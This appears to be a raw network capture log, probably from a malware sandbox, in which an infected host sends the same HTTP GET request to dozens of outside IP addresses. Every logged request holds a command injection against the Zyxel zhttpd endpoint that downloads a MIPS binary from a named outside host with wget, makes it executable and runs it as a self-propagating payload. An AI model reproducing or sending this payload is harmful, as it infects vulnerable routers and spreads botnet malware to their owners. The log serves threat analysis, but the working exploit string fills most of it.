                                      Jan 14, 2024 15:50:08.820173979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      320192.168.2.1434746198.180.59.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:08.820235968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      321192.168.2.145264676.77.179.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:09.824223042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      322192.168.2.145285442.0.132.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:09.824275017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      323192.168.2.1451540161.119.30.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:09.824320078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      324192.168.2.1447876149.240.196.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:09.824359894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      325192.168.2.1453106159.202.20.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:10.827867985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      326192.168.2.14520165.20.2.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:10.827945948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      327192.168.2.1436756221.202.50.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:10.827982903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      328192.168.2.1450652115.241.72.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:11.831893921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      329192.168.2.145336618.4.181.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:11.831943035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      330192.168.2.1460284211.146.58.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:11.832006931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      331192.168.2.14474605.10.211.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:11.832035065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      332192.168.2.1438362184.172.187.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841048956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      333192.168.2.1453324156.36.55.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841094017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      334192.168.2.145953639.122.134.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841195107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      335192.168.2.14549485.156.28.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841243029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      336192.168.2.1449316188.65.29.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841497898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      337192.168.2.1445922124.81.42.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841599941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      338192.168.2.1437162146.154.205.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841641903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      339192.168.2.1458864193.21.207.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841702938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      340192.168.2.144611094.48.94.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841793060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      341192.168.2.143897253.5.120.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841835976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      342192.168.2.144019287.7.119.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841911077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      343192.168.2.1460718164.86.56.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.841948032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      344192.168.2.1446108198.32.74.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842005968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      345192.168.2.145171470.229.194.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842036963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      346192.168.2.1458052141.250.126.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842118979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      347192.168.2.144285877.47.196.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842174053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      348192.168.2.145373614.130.157.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842236042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      349192.168.2.1451272117.25.97.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842272043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      350192.168.2.1439660202.223.45.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842334986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      351192.168.2.144841696.230.108.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842406034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      352192.168.2.144423817.148.18.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842509031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      353192.168.2.1441830129.211.2.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842564106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      354192.168.2.1434872219.18.171.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842609882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      355192.168.2.1450978116.132.223.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842694998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      356192.168.2.1437360124.24.121.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842755079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      357192.168.2.1460404163.74.249.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842825890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      358192.168.2.1437010116.189.22.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842860937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      359192.168.2.1444860168.125.251.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842957973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      360192.168.2.144604275.155.126.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.842999935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      361192.168.2.145549669.111.212.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843070030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      362192.168.2.145474447.64.140.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843133926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      363192.168.2.1445758216.234.235.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843166113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      364192.168.2.1436480193.49.117.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843200922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      365192.168.2.1438598167.91.132.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843271971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      366192.168.2.1459416218.16.200.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843337059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      367192.168.2.1435598100.224.171.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843400002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      368192.168.2.1460156154.111.160.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843480110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      369192.168.2.144395068.144.209.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843581915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      370192.168.2.143805053.135.82.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843620062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      371192.168.2.144364097.78.178.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843673944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      372192.168.2.1451038137.19.9.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843753099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      373192.168.2.1454040189.94.140.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843821049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      374192.168.2.1442218216.81.43.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843884945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      375192.168.2.1458820182.221.248.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.843986034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      376192.168.2.1435714184.227.72.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844012976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      377192.168.2.1442686167.251.137.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844084978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      378192.168.2.143806042.68.105.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844161987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      379192.168.2.145447672.233.9.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844223022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      380192.168.2.1450710202.185.164.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844317913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      381192.168.2.1449470204.241.41.235443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:12.844383955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      382192.168.2.1442446197.146.7.121443
                                      TimestampBytes transferredDirectionData
